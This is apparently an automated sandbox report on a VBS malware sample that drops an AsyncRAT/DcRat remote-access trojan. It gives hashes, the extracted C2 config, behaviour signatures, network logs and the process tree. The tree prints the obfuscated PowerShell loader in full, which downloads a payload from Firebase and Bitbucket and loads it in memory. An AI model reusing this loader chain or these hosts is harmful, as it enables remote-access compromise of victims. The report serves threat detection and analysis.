Analysis
-
max time kernel
92s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2024 01:27
Static task
static1
Behavioral task
behavioral1
Sample
7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs
Resource
win7-20240704-en
General
-
Target
7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs
-
Size
23.1MB
-
MD5
c7b73269543ae666701b2d97172b93fb
-
SHA1
e6d9435df4b136ceac144b84ec9b8fa7cfead13a
-
SHA256
7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c
-
SHA512
3cbd06d2e480e3b62f0881a51f7f94f797201de3b6053f1f6b7728c9e3467c24c5f58d5a2304d75487703ce496de9a5d4ee795cab6a08eefa45dc68324590287
-
SSDEEP
1536:VPadPlP4PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPm:8v
Malware Config
Extracted
https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe
Extracted
asyncrat
1.0.7
Default
zorra123.duckdns.org:2020
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 2 512 powershell.exe 20 512 powershell.exe 22 512 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation WScript.exe -
pid Process 4848 powershell.exe 512 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 bitbucket.org 20 bitbucket.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 512 set thread context of 436 512 powershell.exe 90 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4848 powershell.exe 4848 powershell.exe 512 powershell.exe 512 powershell.exe 512 powershell.exe 512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4848 powershell.exe Token: SeDebugPrivilege 512 powershell.exe Token: SeDebugPrivilege 436 RegSvcs.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2636 wrote to memory of 4848 2636 WScript.exe 85 PID 2636 wrote to memory of 4848 2636 WScript.exe 85 PID 4848 wrote to memory of 512 4848 powershell.exe 88 PID 4848 wrote to memory of 512 4848 powershell.exe 88 PID 512 wrote to memory of 2648 512 powershell.exe 89 PID 512 wrote to memory of 2648 512 powershell.exe 89 PID 512 wrote to memory of 2648 512 powershell.exe 89 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bq▒HI▒Z▒B1▒HI▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒G8▒dQBl▒Ho▒cw▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HU▒ZQBm▒H▒▒ag▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒dQBl▒GY▒c▒Bq▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒dgBl▒HU▒bgBv▒Gk▒dgBu▒GU▒LwBz▒GQ▒YQBv▒Gw▒bgB3▒G8▒Z▒▒v▒HM▒YQBn▒HI▒YQBj▒HM▒ZQBk▒C8▒YwBk▒HM▒YQBj▒GQ▒LwBn▒HI▒bw▒u▒HQ▒ZQBr▒GM▒dQBi▒HQ▒aQBi▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒bwB1▒GU▒egBz▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒GU▒cgB0▒Gc▒cQBl▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bq▒HI▒Z▒B1▒HI▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs');powershell -command $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$jrdur = '0';$ouezs = 'C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs';[Byte[]] $uefpj = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($uefpj).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $ouezs , '_____ertgqe__________________-------------', $jrdur, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:2648
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
-
Network
-
Remote address:8.8.8.8:53Requestfirebasestorage.googleapis.comIN AResponsefirebasestorage.googleapis.comIN A172.217.168.202firebasestorage.googleapis.comIN A142.251.39.106firebasestorage.googleapis.comIN A142.250.179.138firebasestorage.googleapis.comIN A172.217.23.202firebasestorage.googleapis.comIN A142.250.179.170firebasestorage.googleapis.comIN A142.251.36.42firebasestorage.googleapis.comIN A142.251.36.10firebasestorage.googleapis.comIN A142.250.179.202firebasestorage.googleapis.comIN A216.58.214.10
-
GEThttps://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffepowershell.exeRemote address:172.217.168.202:443RequestGET /v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe HTTP/1.1
Host: firebasestorage.googleapis.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Fri, 09 Aug 2024 01:27:26 GMT
Cache-Control: private, max-age=0
Last-Modified: Wed, 03 Jul 2024 14:08:24 GMT
ETag: "5acaccbd879c3f61007eb990ca8b218a"
x-goog-generation: 1720015704370424
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 12972
x-goog-meta-firebaseStorageDownloadTokens: 61c829f6-e196-49e8-b4ff-041134577ffe
Content-Type: text/plain
Content-Disposition: inline; filename*=utf-8''dll%20Hope.txt
x-goog-hash: crc32c=W9dNRw==
x-goog-hash: md5=WsrMvYecP2EAfrmQyoshig==
x-goog-storage-class: STANDARD
Accept-Ranges: bytes
Content-Length: 12972
X-GUploader-UploadID: AHxI1nN9UiHrYcWyxVZXLqRlGAzPzQ8PbVMuRPf-GDQib2FUgol5EKoNmEiFt9twRNHZUFQj7bE
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362powershell.exeRemote address:172.217.168.202:443RequestGET /v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362 HTTP/1.1
Host: firebasestorage.googleapis.com
ResponseHTTP/1.1 200 OK
Date: Fri, 09 Aug 2024 01:27:26 GMT
Cache-Control: private, max-age=0
Last-Modified: Wed, 03 Jul 2024 14:01:52 GMT
ETag: "943e47fb5db1e3ea3fd3dc15ea548bb9"
x-goog-generation: 1720015312004933
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 26536
x-goog-meta-firebaseStorageDownloadTokens: 7fe13398-6aa2-43e8-992c-35095e035362
Content-Type: text/plain
Content-Disposition: inline; filename*=utf-8''Pe%20Hope.txt
x-goog-hash: crc32c=HduiyA==
x-goog-hash: md5=lD5H+12x4+o/09wV6lSLuQ==
x-goog-storage-class: STANDARD
Accept-Ranges: bytes
Content-Length: 26536
X-GUploader-UploadID: AHxI1nNIwbBc25dxE9W2DJTPUsT34HoaPuu8T_VOYqlP1VaVDq9PNZ4LXXlMzysVR92j-pHB0-XJ_nk4Iw
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.dual-a-0034.a-msedge.netg-bing-com.dual-a-0034.a-msedge.netIN CNAMEdual-a-0034.a-msedge.netdual-a-0034.a-msedge.netIN A204.79.197.237dual-a-0034.a-msedge.netIN A13.107.21.237
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=Remote address:204.79.197.237:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=3BA29E871DE267F8084F8A511C0266B4; domain=.bing.com; expires=Wed, 03-Sep-2025 01:27:26 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9004DF6BC08E439AA95AD5EE3AA57132 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
date: Fri, 09 Aug 2024 01:27:25 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=Remote address:204.79.197.237:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3BA29E871DE267F8084F8A511C0266B4
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=sS6RtUKbaiXiKMJ0OBmt2h1uTxQNhgdOLM-MSZxmVIQ; domain=.bing.com; expires=Wed, 03-Sep-2025 01:27:26 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6B30D7C49CDF4B51B75B716C2ADFD483 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
date: Fri, 09 Aug 2024 01:27:25 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=Remote address:204.79.197.237:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3BA29E871DE267F8084F8A511C0266B4; MSPTC=sS6RtUKbaiXiKMJ0OBmt2h1uTxQNhgdOLM-MSZxmVIQ
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B57495C9FED146DE8C65967521672062 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
date: Fri, 09 Aug 2024 01:27:25 GMT
-
Remote address:8.8.8.8:53Request202.168.217.172.in-addr.arpaIN PTRResponse202.168.217.172.in-addr.arpaIN PTRams16s32-in-f101e100net
-
Remote address:8.8.8.8:53Request20.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request237.197.79.204.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestbitbucket.orgIN AResponsebitbucket.orgIN A185.166.141.9bitbucket.orgIN A185.166.141.8bitbucket.orgIN A185.166.141.7
-
Remote address:185.166.141.9:443RequestGET /dcasdc/descargas/downloads/envionuevo.txt HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
Location: https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315
Expires: Fri, 09 Aug 2024 01:27:26 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: 94aa115e3b4c
X-Version: d5ee04fb2c50
X-Static-Version: d5ee04fb2c50
X-Request-Count: 235
X-Render-Time: 0.045334577560424805
X-B3-Traceid: b55ab0c43fb54e239bc27e1a04048e4e
X-B3-Spanid: c70d8cfe88c24ed9
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
X-Usage-Quota-Remaining: 999183.155
X-Usage-Request-Cost: 830.20
X-Usage-User-Time: 0.020761
X-Usage-System-Time: 0.004145
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: b55ab0c43fb54e239bc27e1a04048e4e
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
-
Remote address:8.8.8.8:53Requestbbuseruploads.s3.amazonaws.comIN AResponsebbuseruploads.s3.amazonaws.comIN CNAMEs3-1-w.amazonaws.coms3-1-w.amazonaws.comIN CNAMEs3-w.us-east-1.amazonaws.coms3-w.us-east-1.amazonaws.comIN A52.217.165.225s3-w.us-east-1.amazonaws.comIN A52.216.29.148s3-w.us-east-1.amazonaws.comIN A3.5.30.67s3-w.us-east-1.amazonaws.comIN A52.216.52.161s3-w.us-east-1.amazonaws.comIN A3.5.28.116s3-w.us-east-1.amazonaws.comIN A3.5.28.213s3-w.us-east-1.amazonaws.comIN A3.5.29.163s3-w.us-east-1.amazonaws.comIN A3.5.2.158
-
GEThttps://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315powershell.exeRemote address:52.217.165.225:443RequestGET /d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
